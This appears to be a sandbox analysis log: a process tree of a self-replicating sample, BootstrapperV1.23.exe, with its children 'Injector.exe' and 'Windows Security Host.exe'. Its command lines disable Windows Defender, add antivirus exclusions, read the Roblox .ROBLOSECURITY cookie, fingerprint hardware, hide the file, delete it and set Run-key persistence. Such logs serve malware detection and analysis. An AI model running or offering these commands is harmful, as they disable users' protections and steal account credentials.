C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"25⤵
- Checks computer location settings
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"26⤵
- Executes dropped EXE
PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"26⤵
- Executes dropped EXE
PID:4492
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"26⤵
- Checks computer location settings
PID:3708 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"27⤵
- Executes dropped EXE
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"27⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"27⤵
- Checks computer location settings
PID:3972 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"28⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:3332 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid29⤵PID:696
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"29⤵
- Views/modifies file attributes
PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'29⤵
- Command and Scripting Interpreter: PowerShell
PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 229⤵
- Command and Scripting Interpreter: PowerShell
PID:4908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY29⤵
- Command and Scripting Interpreter: PowerShell
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY29⤵PID:1692
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption29⤵PID:3568
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory29⤵PID:1876
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid29⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER29⤵
- Command and Scripting Interpreter: PowerShell
PID:1464
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name29⤵
- Detects videocard installed
PID:3968
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause29⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3528 -
C:\Windows\system32\PING.EXEping localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"28⤵
- Executes dropped EXE
PID:4200
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"28⤵
- Checks computer location settings
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"29⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"29⤵
- Executes dropped EXE
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"29⤵
- Checks computer location settings
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"30⤵
- Executes dropped EXE
PID:4292
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"30⤵
- Executes dropped EXE
PID:2988
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"30⤵
- Checks computer location settings
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"31⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2788 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid32⤵PID:1240
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"32⤵
- Views/modifies file attributes
PID:2596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'32⤵
- Command and Scripting Interpreter: PowerShell
PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 232⤵
- Command and Scripting Interpreter: PowerShell
PID:456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY32⤵
- Command and Scripting Interpreter: PowerShell
PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY32⤵PID:3940
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption32⤵PID:4620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory32⤵PID:776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid32⤵PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER32⤵
- Command and Scripting Interpreter: PowerShell
PID:1776
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name32⤵
- Detects videocard installed
PID:2032
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause32⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4452 -
C:\Windows\system32\PING.EXEping localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"31⤵
- Executes dropped EXE
PID:3900
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"31⤵
- Checks computer location settings
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"32⤵
- Executes dropped EXE
PID:3272
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"32⤵
- Executes dropped EXE
PID:4092
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"32⤵
- Checks computer location settings
PID:4696 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"33⤵
- Executes dropped EXE
PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"33⤵
- Executes dropped EXE
PID:2372
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"33⤵
- Checks computer location settings
PID:228 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"34⤵PID:1204
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"34⤵PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"34⤵
- Checks computer location settings
PID:4320 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"35⤵
- Drops file in Drivers directory
PID:2076 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:4356
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"36⤵
- Views/modifies file attributes
PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'36⤵
- Command and Scripting Interpreter: PowerShell
PID:1240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 236⤵
- Command and Scripting Interpreter: PowerShell
PID:4652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY36⤵
- Command and Scripting Interpreter: PowerShell
PID:2284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY36⤵PID:1572
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption36⤵PID:976
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory36⤵PID:4972
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid36⤵PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER36⤵
- Command and Scripting Interpreter: PowerShell
PID:3764
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name36⤵
- Detects videocard installed
PID:4024
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause36⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1672 -
C:\Windows\system32\PING.EXEping localhost37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"35⤵PID:3512
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"35⤵
- Checks computer location settings
PID:4136 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"36⤵PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"36⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"36⤵
- Checks computer location settings
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"37⤵PID:4776
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"37⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:3100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'38⤵
- Command and Scripting Interpreter: PowerShell
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\znrubj.exe"C:\Users\Admin\AppData\Local\Temp\znrubj.exe"38⤵
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1792
-
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"37⤵
- Checks computer location settings
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"38⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"38⤵PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"38⤵
- Checks computer location settings
PID:4344 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"39⤵
- Drops file in Drivers directory
PID:4032 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid40⤵PID:4460
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"40⤵
- Views/modifies file attributes
PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'40⤵
- Command and Scripting Interpreter: PowerShell
PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 240⤵
- Command and Scripting Interpreter: PowerShell
PID:4496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY40⤵
- Command and Scripting Interpreter: PowerShell
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY40⤵PID:8
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption40⤵PID:4884
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory40⤵PID:1204
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid40⤵PID:4808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER40⤵PID:3764
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name40⤵
- Detects videocard installed
PID:4620
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause40⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1828 -
C:\Windows\system32\PING.EXEping localhost41⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"39⤵PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"39⤵
- Checks computer location settings
PID:4484 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"40⤵PID:3776
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"40⤵PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"40⤵
- Checks computer location settings
PID:416 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"41⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"41⤵PID:2344
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"41⤵
- Checks computer location settings
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"42⤵
- Drops file in Drivers directory
PID:4004 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:2508
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"43⤵
- Views/modifies file attributes
PID:3536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'43⤵
- Command and Scripting Interpreter: PowerShell
PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 243⤵
- Command and Scripting Interpreter: PowerShell
PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵
- Command and Scripting Interpreter: PowerShell
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY43⤵PID:5004
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption43⤵PID:3100
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory43⤵PID:4084
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid43⤵PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER43⤵
- Command and Scripting Interpreter: PowerShell
PID:384
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name43⤵
- Detects videocard installed
PID:4244
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause43⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2820 -
C:\Windows\system32\PING.EXEping localhost44⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"42⤵PID:816
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"42⤵
- Checks computer location settings
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"43⤵PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"43⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"43⤵
- Checks computer location settings
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"44⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"44⤵PID:4636
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"44⤵
- Checks computer location settings
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"45⤵PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"45⤵PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"45⤵
- Checks computer location settings
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"46⤵
- Drops file in Drivers directory
PID:2372 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid47⤵PID:3752
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"47⤵
- Views/modifies file attributes
PID:1036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'47⤵
- Command and Scripting Interpreter: PowerShell
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 247⤵PID:4376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY47⤵
- Command and Scripting Interpreter: PowerShell
PID:1204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY47⤵PID:1472
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption47⤵PID:2840
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory47⤵PID:4552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid47⤵PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER47⤵
- Command and Scripting Interpreter: PowerShell
PID:2988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name47⤵
- Detects videocard installed
PID:3920
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause47⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:388 -
C:\Windows\system32\PING.EXEping localhost48⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"46⤵PID:776
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"46⤵
- Checks computer location settings
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"47⤵PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"47⤵PID:2452
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"47⤵
- Checks computer location settings
PID:3944 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"48⤵PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"48⤵PID:3344
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"48⤵
- Checks computer location settings
PID:1844 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"49⤵PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"49⤵PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"49⤵
- Checks computer location settings
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\Injector.exe"C:\Users\Admin\AppData\Local\Temp\Injector.exe"50⤵
- Drops file in Drivers directory
PID:5088 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵PID:4436
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"51⤵
- Views/modifies file attributes
PID:696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'51⤵
- Command and Scripting Interpreter: PowerShell
PID:4892
-
-
